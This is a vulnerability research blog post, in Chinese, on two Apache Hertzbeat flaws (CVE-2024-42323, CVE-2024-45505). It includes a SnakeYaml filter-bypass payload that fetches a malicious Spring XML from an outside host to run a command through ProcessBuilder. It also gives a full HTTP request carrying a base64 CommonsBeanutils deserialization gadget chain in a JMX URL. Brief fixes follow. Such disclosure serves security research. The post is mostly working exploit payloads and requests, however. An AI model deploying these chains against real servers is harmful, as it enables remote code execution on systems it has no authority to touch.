yulate's blog

Apache Hertzbeat CVE-2024-42323 & CVE-2024-45505 挖掘记录

2025-02-19 · 5 min read

首发先知社区:https://xz.aliyun.com/news/16801

0x01 前言

2024年2月和yemoli一起挖的两个漏洞,SnakeYaml Deser RCE Bypass & Native Deser RCE,当时该项目还没有被贡献到apache基金会进行孵化。

挖掘记录

SnakeYaml Deser RCE Bypass

SnakeYaml Deser RCE · Advisory · dromara/hertzbeat · GitHub

新版本对传入的数据进行了过滤

Untitled

判断是否包含ScriptEngineManagerURLClassLoader 关键字

Untitled

这是非常容易绕过的,我们可以采用其他的链进行绕过,但是docker环境中jdk版本为11,并且java环境为jre,所以说和ldap有关的利用链就会很难进行绕过,需要自行寻找新的利用链来进行rce,我们需要将目光放到ldap之外的利用方法。

poc如下

{
 "define":"category: !!org.springframework.context.support.ClassPathXmlApplicationContext [\"http://192.168.5.164:8000/hack.xml\"]"
}

该payload采用的是加载恶意xml触发,该类的具体分析看如下文章:

Jackson系列三——CVE-2017-17485(基于ClassPathXmlApplicationContext利用链) [ Mi1k7ea ]

发送数据包

Untitled

恶意xml中写入需要执行的命令

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>touch</value>
				<value>/tmp/pwned</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

pwned

Untitled

Native Deser RCE

by yemeoli

漏洞分析

漏洞点位于org.dromara.hertzbeat.collector.collect.jmx.JmxCollectImpl#getConnectSession

Untitled

用户可以控制url的值,跟进下connect代码,

Untitled

在javax.management.remote.JMXConnectorFactory#newJMXConnector 的调用中最终会返回RMIConnector的实例

Untitled

然后调用RMIConnector的connect方法,最终调用到findRMIServer方法,当url符合相应的要求时,最后可进入jdk原生反序列化逻辑,反序列化url中的base64数据

Untitled
Untitled

项目中存在cb依赖,因此直接打即可

漏洞复现

Poc

POST /api/monitor/detect HTTP/1.1
Host: localhost:1157
Content-Length: 3476
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jFsOwiAURPdyv0tCEQuyFdMPKGPEBzVcMCbGvUsT_TxnJudNl5rIUYSyByuNwLJXQgOLCPA7IWX0UXnooCcaiFvoZx_vKXdKzJ24FWQwi7pekQWjPFG21Vdyo5HWTuOo5EB4Pf5Cm00UnAr4TK6Who7rDT14_PXnzxdXVS9O.eibzYHIPkzb5nSZwzH-oO8ATUi2N9YqCvPb6omB9ahR5OSV2BdrBIUK5iIVEfBuUTnV0Ds4smkKScPB0GEKtiw
sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Accept-Language: zh-CN
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
sec-ch-ua-platform: "macOS"
Origin: http://localhost:1157
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:1157/monitors/new?app=jvm
Accept-Encoding: gzip, deflate, br
Cookie: ajs_anonymous_id=abd5f905-9482-4ca7-979b-b1e79448ee3a; JSESSIONID=8C71AC2150C18FEFBACD2040596F8256; PHPSESSID=13sema32fmlaltj2iq401c1pth; OFBiz.Visitor=10116; _ga=GA1.1.569817222.1708854872; _ga_13PPZZ7P4Y=GS1.1.1708854871.1.1.1708856648.0.0.0
Connection: close

{"detected":true,"collector":"","monitor":{"intervals":60,"tags":[],"app":"jvm","host":"127.0.0.1","name":"JVM_127.0.0.1"},"params":[{"field":"host","type":1,"value":"127.0.0.1"},{"field":"port","type":0,"value":9999},{"field":"url","type":1,"value":"service:jmx:rmi:///stub/rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABPbK/rq+AAAAMwBKCgARACMHACQIACUKACYAJwoAAgAoCAApCgACACoIABIIACsIACwIAC0JABAALgoALwAwCgAvADEHADIHAEEHADQBAANjbWQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEALkx5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL0NvbW1hbmRUZW1wbGF0ZTsBAAg8Y2xpbml0PgEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAHQcAMgEAClNvdXJjZUZpbGUBABRDb21tYW5kVGVtcGxhdGUuamF2YQwAFAAVAQAQamF2YS9sYW5nL1N0cmluZwEAB29zLm5hbWUHADUMADYANwwAOAA5AQADd2luDAA6ADsBAAIvYwEABGJhc2gBAAItYwwAEgATBwA8DAA9AD4MAD8AQAEAE2phdmEvaW8vSU9FeGNlcHRpb24BACx5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL0NvbW1hbmRUZW1wbGF0ZQEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQA7eXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Db21tYW5kVGVtcGxhdGUxMDE2NDI3NTM1NjE3OTMBAD1MeXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Db21tYW5kVGVtcGxhdGUxMDE2NDI3NTM1NjE3OTM7BwBBCQBDAC4BAA90b3VjaCAvdG1wL2NjY2MIAEUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwBHCgBIACMAIQAQAEgAAAABAAgAEgATAAAAAgABABQAFQABABYAAAAvAAEAAQAAAAUqtwBJsQAAAAIAFwAAAAYAAQAAAAUAGAAAAAwAAQAAAAUAGQBCAAAACAAbABUAAQAWAAAAsgADAAIAAABEEkazAEQGvQACSxIDuAAEtgAFEga2AAeZABAqAxIIUyoEEglTpwANKgMSClMqBBILUyoFsgAMU7gADSq2AA5XpwAETLEAAQAKAD8AQgAPAAMAFwAAAC4ACwAFAAoACgANABoADgAfAA8AJwARACwAEgAxABQANwAWAD8AGQBCABcAQwAaABgAAAAMAAEACgA5ABwAHQAAAB4AAAAOAAT8ACcHAB8JUAcAIAAAAQAhAAAAAgAidXEAfgAQAAAB1Mr+ur4AAAAzABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAMkADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AAhSTkRCWVVaU3B3AQB4cQB+AA14"},{"field":"username","type":1,"value":"admin"},{"field":"password","type":1,"value":"222222"}]}

base64是CommonsBeanutils192 的序列化数据,执行的命令为touch /tmp/cccc

Untitled

漏洞修复

  • 禁止参数可控
  • 添加反序列化类白名单